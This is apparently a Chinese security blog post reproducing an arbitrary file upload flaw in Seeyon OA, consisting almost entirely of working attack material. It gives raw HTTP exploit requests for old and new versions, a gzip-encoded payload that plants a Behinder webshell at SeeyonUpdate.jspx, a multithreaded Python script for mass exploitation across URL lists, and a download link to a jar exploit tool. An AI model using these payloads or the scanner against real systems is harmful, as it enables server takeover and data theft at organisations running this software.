致远OA 任意文件上传

作者: print("") 分类: WEB安全,漏洞复现 发布时间: 2021-01-08 21:19

老版本

POST /seeyon/pdfservlet HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198;
Host: xxxxxxx:808
Content-type: application/x-www-form-urlencoded
Content-Length: 388
Connection: close


DBSTEP V3.0     330             0               104             DBSTEP=OKMLlKlV
OPTION=S3WYOSyMLKS6
newPdfFileId=wV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
aaaa



POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198;
Host: xxxxx:808
Content-type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close


method=uploadMenuIcon&fileid=1&filename=upload.jsp

新版本

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: xxxxxx
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198; UM_distinctid=17490a07027c4d-030a052b247d49-31697004-13c680-17490a07028c60; loginPageURL=""
Content-Type: application/x-www-form-urlencoded
Content-Length: 3562


managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00

http://xxxx0//seeyon/SeeyonUpdate.jspx    rebeyond  冰蝎3

Python 脚本

#coding:utf-8
import re
import queue
import threading
import requests
import time
requests.packages.urllib3.disable_warnings()
webqueue = queue.Queue()
mutex = threading.Lock()
GOODURL = []
class HttpScan(threading.Thread):
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self._queue = queue

    def gettile(self,url, proxy=None, timeout=20):
        global GOODURL
        # try:

        if "://" not in url:
            url = "http://{}".format(url)
        headers = {
            'Connection': 'close',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch, br',
            'Accept-Language': 'zh-CN,zh;q=0.8',
            "Content-Type": "application/x-www-form-urlencoded"
        }
        proxy = None
        proxy = {'http': '127.0.0.1:8080','https': '127.0.0.1:8080'}
        data = r"managerMethod=1&arguments=1"
        payload = """managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00"""
        vul = url + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"
        req  = requests.get(url, headers=headers,proxies=proxy, timeout=timeout,verify=False)
        # req  = requests.post(vul, headers=headers,data=data,proxies=proxy, timeout=timeout,verify=False)
        print(vul,req.status_code)
        if req.status_code != 404:
            if 1:
                try:
                    req  = requests.post(vul, headers=headers,data=payload,proxies=proxy, timeout=timeout,verify=False)
                except Exception as e:
                    print(url,e)
                try:
                    shellurl = url + "/seeyon/SeeyonUpdate.jspx"    
                    req  = requests.get(shellurl, headers=headers,proxies=proxy, timeout=timeout,verify=False)
                    print(shellurl,req.status_code)
                    if req.status_code !=404:
                        GOODURL.append(shellurl)
                except Exception as e:
                    print(url,e)
                    pass

        # except Exception as e:
        #     print(e)
        #     # log=("%-30s| %-20s" % (url, e))
        #     # print(log)
        #     pass



    def run(self):
        while not self._queue.empty():
            # try:
            queue_task = self._queue.get(timeout=0.5)
            url = queue_task.strip()
            self.gettile(url)
            time.sleep(0.01)
            # except:
            #     pass





def run_http(webqueue,threadNum =100):
    threads = []
    for num in range(1,threadNum + 1):
        threads.append(HttpScan(webqueue))

    for t in threads:
        t.start()

    for t in threads:
        t.join()

# f = open("port.txt","r")
def main():
    if 0:
        import sys
        if len(sys.argv) ==2:
            filename = sys.argv[1]
        else:
            filename = "url.txt"
        f = open(filename,"r")
        urls = []
        for url in f:
            url = url.strip()
            if "://" not in url:
                url = "http://{}".format(url)
            url = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url)[0]
            urls.append(url)
        urls = list(set(urls))
        f.close()
        for url in urls:
            if len(url) >5:
                webqueue.put(url)
    if 1:
        url = "http://xxxxx"
        webqueue.put(url)
        print(url)
    run_http(webqueue)

main()

jar 利用工具

https://www.o2oxy.cn/wp-content/uploads/2021/01/2021-01.rar

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注